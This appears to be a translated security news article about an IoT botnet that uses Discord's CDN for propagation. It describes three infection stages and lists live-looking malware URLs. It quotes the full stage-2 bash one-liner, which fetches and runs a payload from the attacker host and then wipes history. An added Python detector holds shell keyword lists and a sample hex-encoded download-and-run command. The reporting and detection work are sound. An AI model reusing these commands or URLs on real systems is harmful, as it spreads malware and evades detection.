Samples have recently been discovered of a new IoT botnet that uses the Discord CDN for propagation, which could seriously hamper attempts to block it.
Security researcher @0xrb recently posted on Twitter a list of URLs belonging to a new IoT botnet that uses the infrastructure of the popular communication tool.
The notable thing about this botnet is that it uses the Discord CDN to evade the blocklists of IDS devices. It also includes anti-sandbox and anti-detection techniques such as timeouts, deleting logs, and using hexadecimal strings as intermediate payloads.
The following describes the infection process:
1- The infection starts by downloading a bash script from the URL hxxps://cdn.discordapp.com/attachments/779820448182960152/780735645169352765/ugyuftyufydurdiytyabins.sh. To upload this file, the attacker used the file-sharing feature of the Discord application and copied the link by right-clicking on the shared file.
The script in question downloads a binary compiled for several platforms. This binary is executed and later deleted.
2- In the second phase, the malware sends a GET request to the URL hxxp://22.214.171.124//vivid and receives a response. This sequence of bytes is executed directly on the machine and leaves no trace in any file. It is an obfuscation and evasion technique in which the payload is delivered in hexadecimal format, which is then decoded directly into a command executed by the victim's bash interpreter:
(while true; do (sleep $((RANDOM % 200)); (printf "wget -q http://gay.energy//os -O .; chmod 777 .; ./.; rm -rf .; clear; clear; history -c" > /dev/null 2>&1 | bash) &> /dev/null 2>&1) & sleep 43200; done & disown &) > /dev/null 2>&1 & clear; clear; history -c
The script in question does the following:
- Waits for a random amount of time (to avoid detection by antivirus programs)
- Downloads the phase-3 payload from the address http://gay.energy//os
- Clears the bash history
3- In the third phase, the previously downloaded file (os) is also a bash script that does the following:
- Creates a new user
- Makes requests to a PHP server (hxxp://gay.energy/WelcomeNewBotBuddy/OwO.php), which registers the newly infected device. The registration request includes information about the backdoor installed on the victim's machine (an SSH server), as well as its CPU, RAM and swap.
- Finally, deletes the logs and the bash history.
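As an added example (not code from the article or from the malware author), the following Python sketch shows how a defender might flag the two behaviours described above in web-proxy logs: script or binary fetches from Discord's attachment CDN, and responses consisting of a bare hex string that decodes to a shell command. The log layout, client addresses, attachment IDs and the stage-2-style command are constructed for the demo.

```python
import binascii
import re
from urllib.parse import urlparse

DISCORD_CDN = "cdn.discordapp.com"
SCRIPT_EXT = (".sh", ".bash", ".bin", ".elf")
# Substrings that mark decoded text as a shell payload rather than random bytes.
SHELL_MARKERS = ("wget ", "curl ", "chmod ", "| bash", "history -c", "rm -rf")

def suspicious_cdn_download(url, content_type):
    """True when a Discord attachment looks like a script/binary, not media."""
    p = urlparse(url)
    if p.hostname != DISCORD_CDN or not p.path.startswith("/attachments/"):
        return False
    if p.path.lower().endswith(SCRIPT_EXT):
        return True
    # Legitimate attachments are overwhelmingly image/video/audio content.
    return not content_type.startswith(("image/", "video/", "audio/"))

def hex_payload_to_shell(body):
    """Decode a pure-hex body; return the text if it reads like a shell command."""
    body = body.strip()
    if len(body) < 8 or len(body) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", body):
        return None
    try:
        text = binascii.unhexlify(body).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if any(m in text for m in SHELL_MARKERS) else None

def scan_log(log):
    """Constructed line layout: time client method url status content-type body-or-dash."""
    hits = []
    for line in log.strip().splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        client, url, ctype = parts[1], parts[3], parts[5]
        body = parts[6] if len(parts) > 6 else "-"
        if suspicious_cdn_download(url, ctype):
            hits.append((client, "discord-cdn-dropper", url))
        elif hex_payload_to_shell(body):
            hits.append((client, "hex-shell-payload", url))
    return hits

# Constructed sample log (not real traffic); the hex body encodes a stage-2-style command.
STAGE2 = binascii.hexlify(b"wget -q http://198.51.100.23//os -O x; chmod 777 x; ./x; history -c").decode()
SAMPLE_LOG = f"""
2020-11-24T10:00:01Z 10.0.0.7 GET https://cdn.discordapp.com/attachments/1111/2222/update.sh 200 application/octet-stream -
2020-11-24T10:00:02Z 10.0.0.7 GET https://cdn.discordapp.com/attachments/3333/4444/cat.png 200 image/png -
2020-11-24T10:00:05Z 10.0.0.7 GET http://198.51.100.23//vivid 200 text/plain {STAGE2}
"""
```

Running `scan_log(SAMPLE_LOG)` returns one hit for the .sh attachment and one for the hex response, while the image attachment is left alone.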
Another strange fact about this malware is that its author has commented on the matter and defends it as research: he wanted to test which servers remained infected and undetected the longest.
The author maintains that he had no malicious intent and that he wanted to make analysts' work easier by leaving the final payload in the clear.
Source: Una al día
Copyright © Grupo Edefa SA. Reproduction, in whole or in part, of this article is prohibited without the prior authorization of the publisher.